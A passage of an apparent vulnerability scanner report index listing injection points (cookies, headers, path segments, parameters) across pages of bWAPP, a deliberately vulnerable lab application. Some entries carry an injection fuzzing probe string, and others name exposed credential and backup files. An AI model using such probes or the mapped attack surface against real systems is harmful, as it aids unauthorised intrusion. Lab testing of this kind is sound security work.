28.39. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/ [name of an arbitrarily supplied URL parameter]

28.40. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/ [secret cookie]

28.41. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/ [security_level cookie]

28.42. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/ [PHPSESSID cookie]

28.43. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/ [Referer HTTP header]

28.44. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/ [URL path folder 6]

28.45. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/ [User-Agent HTTP header]

28.46. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/ [admin cookie]

28.47. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/ [movie_genre cookie]

28.48. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/ [name of an arbitrarily supplied URL parameter]

28.49. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/ [secret cookie]

28.50. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/ [security_level cookie]

28.51. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/ [PHPSESSID cookie]

28.52. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/ [Referer HTTP header]

28.53. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/ [URL path folder 7]

28.54. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/ [User-Agent HTTP header]

28.55. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/ [admin cookie]

28.56. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/ [movie_genre cookie]

28.57. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/ [name of an arbitrarily supplied URL parameter]

28.58. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/ [secret cookie]

28.59. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/ [security_level cookie]

28.60. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/ [PHPSESSID cookie]

28.61. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/ [Referer HTTP header]

28.62. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/ [URL path folder 8]

28.63. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/ [User-Agent HTTP header]

28.64. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/ [admin cookie]

28.65. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/ [movie_genre cookie]

28.66. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/ [name of an arbitrarily supplied URL parameter]

28.67. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/ [secret cookie]

28.68. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/ [security_level cookie]

28.69. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [Referer HTTP header]

28.70. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [URL path filename]

28.71. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [User-Agent HTTP header]

28.72. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [name of an arbitrarily supplied URL parameter]

28.73. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [PHPSESSID cookie]

28.74. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [Referer HTTP header]

28.75. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [URL path filename]

28.76. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [User-Agent HTTP header]

28.77. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [admin cookie]

28.78. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [movie_genre cookie]

28.79. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [name of an arbitrarily supplied URL parameter]

28.80. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [secret cookie]

28.81. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [security_level cookie]

28.82. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [PHPSESSID cookie]

28.83. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [Referer HTTP header]

28.84. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [URL path filename]

28.85. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [User-Agent HTTP header]

28.86. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [admin cookie]

28.87. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [movie_genre cookie]

28.88. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [name of an arbitrarily supplied URL parameter]

28.89. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [secret cookie]

28.90. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/DTD/xhtml1-transitional.dtd [security_level cookie]

28.91. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd [PHPSESSID cookie]

28.92. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd [Referer HTTP header]

28.93. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd [URL path filename]

28.94. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd [User-Agent HTTP header]

28.95. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd [admin cookie]

28.96. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd [movie_genre cookie]

28.97. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd [name of an arbitrarily supplied URL parameter]

28.98. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd [secret cookie]

28.99. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/DTD/xhtml1-transitional.dtd [security_level cookie]

28.100. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd [PHPSESSID cookie]

28.101. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd [Referer HTTP header]

28.102. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd [URL path filename]

28.103. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd [User-Agent HTTP header]

28.104. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd [admin cookie]

28.105. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd [movie_genre cookie]

28.106. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd [name of an arbitrarily supplied URL parameter]

28.107. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd [secret cookie]

28.108. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/DTD/xhtml1-transitional.dtd [security_level cookie]

28.109. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd [PHPSESSID cookie]

28.110. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd [Referer HTTP header]

28.111. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd [URL path filename]

28.112. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd [User-Agent HTTP header]

28.113. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd [admin cookie]

28.114. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd [movie_genre cookie]

28.115. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd [name of an arbitrarily supplied URL parameter]

28.116. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd [secret cookie]

28.117. http://192.168.52.147/bWAPP/admin/phpinfo.php/DTD/xhtml1-transitional.dtd [security_level cookie]

28.118. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c [PHPSESSID cookie]

28.119. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c [Referer HTTP header]

28.120. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c [URL path filename]

28.121. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c [User-Agent HTTP header]

28.122. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c [admin cookie]

28.123. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c [name of an arbitrarily supplied URL parameter]

28.124. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c [secret cookie]

28.125. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c [security_level cookie]

28.126. http://192.168.52.147/bWAPP/admin/phpinfo.php/a'a%5c'b%22c%3e%3f%3e%25%7d%7d%25%25%3ec%3c[[%3f$%7b%7b%25%7d%7dcake%5c [top_security_nossl cookie]

28.127. http://192.168.52.147/bWAPP/aim.php [URL path filename]

28.128. http://192.168.52.147/bWAPP/aim.php [name of an arbitrarily supplied URL parameter]

28.129. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [URL path filename]

28.130. http://192.168.52.147/bWAPP/ba_captcha_bypass.php [name of an arbitrarily supplied URL parameter]

28.131. http://192.168.52.147/bWAPP/ba_forgotten.php [URL path filename]

28.132. http://192.168.52.147/bWAPP/ba_forgotten.php [name of an arbitrarily supplied URL parameter]

28.133. http://192.168.52.147/bWAPP/ba_insecure_login.php [URL path filename]

28.134. http://192.168.52.147/bWAPP/ba_insecure_login.php [name of an arbitrarily supplied URL parameter]

28.135. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [URL path filename]

28.136. http://192.168.52.147/bWAPP/ba_insecure_login_2.php [name of an arbitrarily supplied URL parameter]

28.137. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [URL path filename]

28.138. http://192.168.52.147/bWAPP/ba_pwd_attacks.php [name of an arbitrarily supplied URL parameter]

28.139. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [URL path filename]

28.140. http://192.168.52.147/bWAPP/ba_pwd_attacks_2.php [name of an arbitrarily supplied URL parameter]

28.141. http://192.168.52.147/bWAPP/ba_weak_pwd.php [URL path filename]

28.142. http://192.168.52.147/bWAPP/ba_weak_pwd.php [name of an arbitrarily supplied URL parameter]

28.143. http://192.168.52.147/bWAPP/bof_1.php [URL path filename]

28.144. http://192.168.52.147/bWAPP/bof_1.php [name of an arbitrarily supplied URL parameter]

28.145. http://192.168.52.147/bWAPP/bof_2.php [URL path filename]

28.146. http://192.168.52.147/bWAPP/bof_2.php [name of an arbitrarily supplied URL parameter]

28.147. http://192.168.52.147/bWAPP/captcha_box.php [URL path filename]

28.148. http://192.168.52.147/bWAPP/captcha_box.php [name of an arbitrarily supplied URL parameter]

28.149. http://192.168.52.147/bWAPP/cgi-bin/shellshock.sh [URL path filename]

28.150. http://192.168.52.147/bWAPP/clickjacking.php [URL path filename]

28.151. http://192.168.52.147/bWAPP/clickjacking.php [name of an arbitrarily supplied URL parameter]

28.152. http://192.168.52.147/bWAPP/commandi.php [URL path filename]

28.153. http://192.168.52.147/bWAPP/commandi.php [name of an arbitrarily supplied URL parameter]

28.154. http://192.168.52.147/bWAPP/commandi.php [target parameter]

28.155. http://192.168.52.147/bWAPP/commandi_blind.php [URL path filename]

28.156. http://192.168.52.147/bWAPP/commandi_blind.php [name of an arbitrarily supplied URL parameter]

28.157. http://192.168.52.147/bWAPP/csrf_2.php [URL path filename]

28.158. http://192.168.52.147/bWAPP/csrf_2.php [name of an arbitrarily supplied URL parameter]

28.159. http://192.168.52.147/bWAPP/csrf_3.php [URL path filename]

28.160. http://192.168.52.147/bWAPP/csrf_3.php [name of an arbitrarily supplied URL parameter]

28.161. http://192.168.52.147/bWAPP/directory_traversal_1.php [URL path filename]

28.162. http://192.168.52.147/bWAPP/directory_traversal_1.php [name of an arbitrarily supplied URL parameter]

28.163. http://192.168.52.147/bWAPP/directory_traversal_2.php [URL path filename]

28.164. http://192.168.52.147/bWAPP/directory_traversal_2.php [name of an arbitrarily supplied URL parameter]

28.165. http://192.168.52.147/bWAPP/fonts/ [URL path folder 2]

28.166. http://192.168.52.147/bWAPP/fonts/arial.ttf [URL path filename]

28.167. http://192.168.52.147/bWAPP/fonts/arialbd.ttf [URL path filename]

28.168. http://192.168.52.147/bWAPP/fonts/arialbi.ttf [URL path filename]

28.169. http://192.168.52.147/bWAPP/fonts/ariali.ttf [URL path filename]

28.170. http://192.168.52.147/bWAPP/fonts/ariblk.ttf [URL path filename]

28.171. http://192.168.52.147/bWAPP/fonts/atommicclock.gdf [URL path filename]

28.172. http://192.168.52.147/bWAPP/fonts/backlash.gdf [URL path filename]

28.173. http://192.168.52.147/bWAPP/fonts/hootie.gdf [URL path filename]

28.174. http://192.168.52.147/bWAPP/heartbleed.php [URL path filename]

28.175. http://192.168.52.147/bWAPP/heartbleed.php [name of an arbitrarily supplied URL parameter]

28.176. http://192.168.52.147/bWAPP/hostheader_1.php [URL path filename]

28.177. http://192.168.52.147/bWAPP/hostheader_1.php [name of an arbitrarily supplied URL parameter]

28.178. http://192.168.52.147/bWAPP/hostheader_2.php [URL path filename]

28.179. http://192.168.52.147/bWAPP/hostheader_2.php [name of an arbitrarily supplied URL parameter]

28.180. http://192.168.52.147/bWAPP/hpp-1.php [URL path filename]

28.181. http://192.168.52.147/bWAPP/hpp-1.php [name of an arbitrarily supplied URL parameter]

28.182. http://192.168.52.147/bWAPP/hpp-2.php [URL path filename]

28.183. http://192.168.52.147/bWAPP/hpp-2.php [name of an arbitrarily supplied URL parameter]

28.184. http://192.168.52.147/bWAPP/hpp-3.php [URL path filename]

28.185. http://192.168.52.147/bWAPP/hpp-3.php [name of an arbitrarily supplied URL parameter]

28.186. http://192.168.52.147/bWAPP/htmli_current_url.php [URL path filename]

28.187. http://192.168.52.147/bWAPP/htmli_current_url.php [name of an arbitrarily supplied URL parameter]

28.188. http://192.168.52.147/bWAPP/htmli_get.php [URL path filename]

28.189. http://192.168.52.147/bWAPP/htmli_get.php [name of an arbitrarily supplied URL parameter]

28.190. http://192.168.52.147/bWAPP/htmli_post.php [URL path filename]

28.191. http://192.168.52.147/bWAPP/htmli_post.php [name of an arbitrarily supplied URL parameter]

28.192. http://192.168.52.147/bWAPP/htmli_stored.php [URL path filename]

28.193. http://192.168.52.147/bWAPP/htmli_stored.php [name of an arbitrarily supplied URL parameter]

28.194. http://192.168.52.147/bWAPP/http_response_splitting.php [URL path filename]

28.195. http://192.168.52.147/bWAPP/http_response_splitting.php [name of an arbitrarily supplied URL parameter]

28.196. http://192.168.52.147/bWAPP/http_verb_tampering.php [URL path filename]

28.197. http://192.168.52.147/bWAPP/http_verb_tampering.php [name of an arbitrarily supplied URL parameter]

28.198. http://192.168.52.147/bWAPP/iframei.php [URL path filename]

28.199. http://192.168.52.147/bWAPP/iframei.php [name of an arbitrarily supplied URL parameter]

28.200. http://192.168.52.147/bWAPP/images/file.txt [URL path filename]

28.201. http://192.168.52.147/bWAPP/information_disclosure_1.php [URL path filename]

28.202. http://192.168.52.147/bWAPP/information_disclosure_1.php [name of an arbitrarily supplied URL parameter]

28.203. http://192.168.52.147/bWAPP/information_disclosure_2.php [URL path filename]

28.204. http://192.168.52.147/bWAPP/information_disclosure_2.php [name of an arbitrarily supplied URL parameter]

28.205. http://192.168.52.147/bWAPP/information_disclosure_3.php [URL path filename]

28.206. http://192.168.52.147/bWAPP/information_disclosure_3.php [name of an arbitrarily supplied URL parameter]

28.207. http://192.168.52.147/bWAPP/information_disclosure_4.php [URL path filename]

28.208. http://192.168.52.147/bWAPP/information_disclosure_4.php [name of an arbitrarily supplied URL parameter]

28.209. http://192.168.52.147/bWAPP/insecure_crypt_storage_1.php [URL path filename]

28.210. http://192.168.52.147/bWAPP/insecure_crypt_storage_1.php [name of an arbitrarily supplied URL parameter]

28.211. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php [URL path filename]

28.212. http://192.168.52.147/bWAPP/insecure_crypt_storage_2.php [name of an arbitrarily supplied URL parameter]

28.213. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php [URL path filename]

28.214. http://192.168.52.147/bWAPP/insecure_crypt_storage_3.php [name of an arbitrarily supplied URL parameter]

28.215. http://192.168.52.147/bWAPP/insecure_direct_object_ref_1.php [URL path filename]

28.216. http://192.168.52.147/bWAPP/insecure_direct_object_ref_1.php [name of an arbitrarily supplied URL parameter]

28.217. http://192.168.52.147/bWAPP/insecure_direct_object_ref_2.php [URL path filename]

28.218. http://192.168.52.147/bWAPP/insecure_direct_object_ref_2.php [name of an arbitrarily supplied URL parameter]

28.219. http://192.168.52.147/bWAPP/insecure_direct_object_ref_3.php [URL path filename]

28.220. http://192.168.52.147/bWAPP/insecure_direct_object_ref_3.php [name of an arbitrarily supplied URL parameter]

28.221. http://192.168.52.147/bWAPP/insecure_iframe.php [URL path filename]

28.222. http://192.168.52.147/bWAPP/insecure_iframe.php [name of an arbitrarily supplied URL parameter]

28.223. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php [URL path filename]

28.224. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_1.php [name of an arbitrarily supplied URL parameter]

28.225. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_2.php [URL path filename]

28.226. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_2.php [name of an arbitrarily supplied URL parameter]

28.227. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_3.php [URL path filename]

28.228. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_3.php [name of an arbitrarily supplied URL parameter]

28.229. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_4.php [URL path filename]

28.230. http://192.168.52.147/bWAPP/insuff_transp_layer_protect_4.php [name of an arbitrarily supplied URL parameter]

28.231. http://192.168.52.147/bWAPP/ldap_connect.php [URL path filename]

28.232. http://192.168.52.147/bWAPP/ldap_connect.php [name of an arbitrarily supplied URL parameter]

28.233. http://192.168.52.147/bWAPP/ldapi.php [URL path filename]

28.234. http://192.168.52.147/bWAPP/ldapi.php [name of an arbitrarily supplied URL parameter]

28.235. http://192.168.52.147/bWAPP/lfi_sqlitemanager.php [URL path filename]

28.236. http://192.168.52.147/bWAPP/lfi_sqlitemanager.php [name of an arbitrarily supplied URL parameter]

28.237. http://192.168.52.147/bWAPP/login.php [URL path filename]

28.238. http://192.168.52.147/bWAPP/login.php [name of an arbitrarily supplied URL parameter]

28.239. http://192.168.52.147/bWAPP/logout.php [URL path filename]

28.240. http://192.168.52.147/bWAPP/logout.php [name of an arbitrarily supplied URL parameter]

28.241. http://192.168.52.147/bWAPP/logs/ [URL path folder 2]

28.242. http://192.168.52.147/bWAPP/logs/visitors.txt [URL path filename]

28.243. http://192.168.52.147/bWAPP/maili.php [URL path filename]

28.244. http://192.168.52.147/bWAPP/maili.php [name of an arbitrarily supplied URL parameter]

28.245. http://192.168.52.147/bWAPP/manual_interv.php [URL path filename]

28.246. http://192.168.52.147/bWAPP/manual_interv.php [name of an arbitrarily supplied URL parameter]

28.247. http://192.168.52.147/bWAPP/password_change.php [URL path filename]

28.248. http://192.168.52.147/bWAPP/password_change.php [name of an arbitrarily supplied URL parameter]

28.249. http://192.168.52.147/bWAPP/passwords/ [URL path folder 2]

28.250. http://192.168.52.147/bWAPP/passwords/accounts.txt [URL path filename]

28.251. http://192.168.52.147/bWAPP/passwords/heroes.xml [URL path filename]

28.252. http://192.168.52.147/bWAPP/passwords/web.config.bak [URL path filename]

28.253. http://192.168.52.147/bWAPP/passwords/wp-config.bak [URL path filename]

28.254. http://192.168.52.147/bWAPP/php_cgi.php [URL path filename]

28.255. http://192.168.52.147/bWAPP/php_cgi.php [name of an arbitrarily supplied URL parameter]

28.256. http://192.168.52.147/bWAPP/php_eval.php [URL path filename]

28.257. http://192.168.52.147/bWAPP/php_eval.php [name of an arbitrarily supplied URL parameter]

28.258. http://192.168.52.147/bWAPP/phpi.php [URL path filename]

28.259. http://192.168.52.147/bWAPP/phpi.php [name of an arbitrarily supplied URL parameter]

28.260. http://192.168.52.147/bWAPP/phpi_sqlitemanager.php [URL path filename]

28.261. http://192.168.52.147/bWAPP/phpi_sqlitemanager.php [name of an arbitrarily supplied URL parameter]

28.262. http://192.168.52.147/bWAPP/portal.php [URL path filename]

28.263. http://192.168.52.147/bWAPP/portal.php [name of an arbitrarily supplied URL parameter]

28.264. http://192.168.52.147/bWAPP/restrict_device_access.php [URL path filename]

28.265. http://192.168.52.147/bWAPP/restrict_device_access.php [name of an arbitrarily supplied URL parameter]

28.266. http://192.168.52.147/bWAPP/restrict_folder_access.php [URL path filename]

28.267. http://192.168.52.147/bWAPP/restrict_folder_access.php [name of an arbitrarily supplied URL parameter]

28.268. http://192.168.52.147/bWAPP/rlfi.php [URL path filename]

28.269. http://192.168.52.147/bWAPP/rlfi.php [name of an arbitrarily supplied URL parameter]

28.270. http://192.168.52.147/bWAPP/robots.txt [URL path filename]

28.271. http://192.168.52.147/bWAPP/secret-cors-2.php [URL path filename]

28.272. http://192.168.52.147/bWAPP/secret-cors-2.php [name of an arbitrarily supplied URL parameter]

28.273. http://192.168.52.147/bWAPP/secret.php [URL path filename]

28.274. http://192.168.52.147/bWAPP/secret.php [name of an arbitrarily supplied URL parameter]

28.275. http://192.168.52.147/bWAPP/secret_html.php [URL path filename]

28.276. http://192.168.52.147/bWAPP/secret_html.php [name of an arbitrarily supplied URL parameter]

28.277. http://192.168.52.147/bWAPP/security_level_set.php [URL path filename]

28.278. http://192.168.52.147/bWAPP/security_level_set.php [name of an arbitrarily supplied URL parameter]

28.279. http://192.168.52.147/bWAPP/shellshock.php [URL path filename]

28.280. http://192.168.52.147/bWAPP/shellshock.php [name of an arbitrarily supplied URL parameter]

28.281. http://192.168.52.147/bWAPP/sm_cors.php [URL path filename]

28.282. http://192.168.52.147/bWAPP/sm_cors.php [name of an arbitrarily supplied URL parameter]

28.283. http://192.168.52.147/bWAPP/sm_cross_domain_policy.php [URL path filename]

28.284. http://192.168.52.147/bWAPP/sm_cross_domain_policy.php [name of an arbitrarily supplied URL parameter]

28.285. http://192.168.52.147/bWAPP/sm_dos_1.php [URL path filename]

28.286. http://192.168.52.147/bWAPP/sm_dos_1.php [name of an arbitrarily supplied URL parameter]

28.287. http://192.168.52.147/bWAPP/sm_dos_3.php [URL path filename]

28.288. http://192.168.52.147/bWAPP/sm_dos_3.php [name of an arbitrarily supplied URL parameter]

28.289. http://192.168.52.147/bWAPP/sm_dos_4.php [URL path filename]

28.290. http://192.168.52.147/bWAPP/sm_dos_4.php [name of an arbitrarily supplied URL parameter]

28.291. http://192.168.52.147/bWAPP/sm_ftp.php [URL path filename]

28.292. http://192.168.52.147/bWAPP/sm_ftp.php [name of an arbitrarily supplied URL parameter]

28.293. http://192.168.52.147/bWAPP/sm_local_priv_esc_1.php [URL path filename]

28.294. http://192.168.52.147/bWAPP/sm_local_priv_esc_1.php [name of an arbitrarily supplied URL parameter]

28.295. http://192.168.52.147/bWAPP/sm_local_priv_esc_2.php [URL path filename]

28.296. http://192.168.52.147/bWAPP/sm_local_priv_esc_2.php [name of an arbitrarily supplied URL parameter]

28.297. http://192.168.52.147/bWAPP/sm_mitm_1.php [URL path filename]

28.298. http://192.168.52.147/bWAPP/sm_mitm_1.php [name of an arbitrarily supplied URL parameter]

28.299. http://192.168.52.147/bWAPP/sm_mitm_2.php [URL path filename]

28.300. http://192.168.52.147/bWAPP/sm_mitm_2.php [name of an arbitrarily supplied URL parameter]

28.301. http://192.168.52.147/bWAPP/sm_robots.php [URL path filename]

28.302. http://192.168.52.147/bWAPP/sm_robots.php [name of an arbitrarily supplied URL parameter]

28.303. http://192.168.52.147/bWAPP/sm_samba.php [URL path filename]

28.304. http://192.168.52.147/bWAPP/sm_samba.php [name of an arbitrarily supplied URL parameter]

28.305. http://192.168.52.147/bWAPP/sm_snmp.php [URL path filename]

28.306. http://192.168.52.147/bWAPP/sm_snmp.php [name of an arbitrarily supplied URL parameter]

28.307. http://192.168.52.147/bWAPP/sm_webdav.php [URL path filename]

28.308. http://192.168.52.147/bWAPP/sm_webdav.php [name of an arbitrarily supplied URL parameter]

28.309. http://192.168.52.147/bWAPP/sm_xst.php [URL path filename]

28.310. http://192.168.52.147/bWAPP/sm_xst.php [name of an arbitrarily supplied URL parameter]

28.311. http://192.168.52.147/bWAPP/smgmt_admin_portal.php [URL path filename]

28.312. http://192.168.52.147/bWAPP/smgmt_admin_portal.php [name of an arbitrarily supplied URL parameter]

28.313. http://192.168.52.147/bWAPP/smgmt_cookies_httponly.php [URL path filename]

28.314. http://192.168.52.147/bWAPP/smgmt_cookies_httponly.php [name of an arbitrarily supplied URL parameter]

28.315. http://192.168.52.147/bWAPP/smgmt_cookies_secure.php [URL path filename]

28.316. http://192.168.52.147/bWAPP/smgmt_cookies_secure.php [name of an arbitrarily supplied URL parameter]

28.317. http://192.168.52.147/bWAPP/smgmt_sessionid_url.php [URL path filename]

28.318. http://192.168.52.147/bWAPP/smgmt_sessionid_url.php [name of an arbitrarily supplied URL parameter]

28.319. http://192.168.52.147/bWAPP/smgmt_strong_sessions.php [URL path filename]

28.320. http://192.168.52.147/bWAPP/smgmt_strong_sessions.php [name of an arbitrarily supplied URL parameter]

28.321. http://192.168.52.147/bWAPP/sqli_1.php [URL path filename]

28.322. http://192.168.52.147/bWAPP/sqli_1.php [name of an arbitrarily supplied URL parameter]

28.323. http://192.168.52.147/bWAPP/sqli_10-1.php [URL path filename]

28.324. http://192.168.52.147/bWAPP/sqli_10-1.php [name of an arbitrarily supplied URL parameter]

28.325. http://192.168.52.147/bWAPP/sqli_11.php [URL path filename]

28.326. http://192.168.52.147/bWAPP/sqli_11.php [name of an arbitrarily supplied URL parameter]

28.327. http://192.168.52.147/bWAPP/sqli_12.php [URL path filename]

28.328. http://192.168.52.147/bWAPP/sqli_12.php [name of an arbitrarily supplied URL parameter]

28.329. http://192.168.52.147/bWAPP/sqli_13.php [URL path filename]

28.330. http://192.168.52.147/bWAPP/sqli_13.php [name of an arbitrarily supplied URL parameter]

28.331. http://192.168.52.147/bWAPP/sqli_14.php [URL path filename]

28.332. http://192.168.52.147/bWAPP/sqli_14.php [name of an arbitrarily supplied URL parameter]

28.333. http://192.168.52.147/bWAPP/sqli_15.php [URL path filename]

28.334. http://192.168.52.147/bWAPP/sqli_15.php [name of an arbitrarily supplied URL parameter]

28.335. http://192.168.52.147/bWAPP/sqli_16.php [URL path filename]

